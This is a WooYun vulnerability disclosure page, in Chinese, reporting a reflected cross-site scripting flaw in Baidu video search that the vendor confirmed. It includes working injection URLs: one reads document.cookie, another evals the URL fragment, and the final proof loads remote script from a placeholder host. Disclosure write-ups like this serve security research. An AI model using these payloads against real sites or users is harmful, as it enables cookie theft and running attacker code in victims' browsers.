当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068603

漏洞标题:百度搜索反射型跨站第二弹

相关厂商:百度

漏洞作者: vanilla

提交时间:2014-07-15 15:49

修复时间:2014-08-29 15:50

公开时间:2014-08-29 15:50

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:8

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-15: 细节已通知厂商并且等待厂商处理中
2014-07-15: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向核心白帽子及相关领域专家公开
2014-08-04: 细节向普通白帽子公开
2014-08-14: 细节向实习白帽子公开
2014-08-29: 细节向公众公开

简要描述:

说好的续集,今天终于兑现了,实际上放在那儿好久了,一直忘了发。问题出在百度视频搜索。你将看到一个曲折的加载远程js的过程

详细说明:

在视频搜索 v.baidu.com
用普通的测试代码进行搜索没有发现任何问题,过滤很严格.
尝试宽字节:

http://v.baidu.com/#word=%bf",alert&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8


还是没有任何异常......
尝试多种姿势
没有异常
...........
当我测试到 %ff的时候奇迹出现了

http://v.baidu.com/#word=%ff"a&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8


发现多了一条网络访问,而且控制台报错了:

link1.jpg


而且可以alert

http://v.baidu.com/v?word=%ff%22,a:alert(document.cookie),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#pn=20&qq-pf-to=pcqq.temporaryc2c


link2.jpg


link3.jpg


但是仅仅弹个框框是完全不够的,我要加载js,于是我尝试

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#alert(1)//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite


并没有成功,因为百度没有收录b:eval(location.hash.slice(1))这个视频,因此没有搜索结果,也不会触发这个跨站
那我们要怎么做呢
没错,它没有我们就去上传一个,于是我去注册了个优酷账号,然后上传了一个名为
b:eval(location.hash.slice(1))的视频,接着我把链接提交给了百度,然后就是漫长的等待,也不知道过了多久,有一天我访问

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#alert(1)//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite


发现弹出了

link4.jpg


加载远程js什么的就简单了
由于IE浏览器filter的原因,IE浏览器下访问会直接卡死,暂时没有找到绕过的方法

link5.jpg


做个总结吧:
1、当你尝试宽字节的时候,除了%bf,%ef外,不要忘了%ff
2、环境不允许的时候,我们可以创造环境。

漏洞证明:

在chrome,360极速浏览器或者火狐浏览器下执行,弹框

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#alert(1)//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite


link4.jpg


加载远程js

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#with(document)body.appendChild(createElement('script')).src='xx.com'//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite

修复方案:

方法1、删除那个视频
方法2、修复宽字节的问题

版权声明:转载请注明来源 vanilla@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-07-15 16:22

厂商回复:

感谢对百度安全的支持。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-15 15:53 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    哎,小厂商流程

  2. 2014-07-15 16:30 | vanilla ( 路人 | Rank:8 漏洞数:3 | xss,javascript,代码审计)

    好伤心

  3. 2014-08-05 10:30 | xiaoL ( 普通白帽子 | Rank:361 漏洞数:67 | PKAV技术宅社区!Blog:http://www.xlixli....)

    感觉不错哦!

  4. 2014-08-16 15:03 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    @xiaoL 呵呵这是我另一个号

  5. 2015-06-02 15:42 | wusuopubupt ( 路人 | Rank:3 漏洞数:2 | BUPTer, linux lover.)

    碉堡了!

  6. 2015-06-02 16:22 | 香草 ( 实习白帽子 | Rank:99 漏洞数:14 | javascript,xss,jsp、aspx)

    @wusuopubupt 后来我才知道其实根本不需要那个视频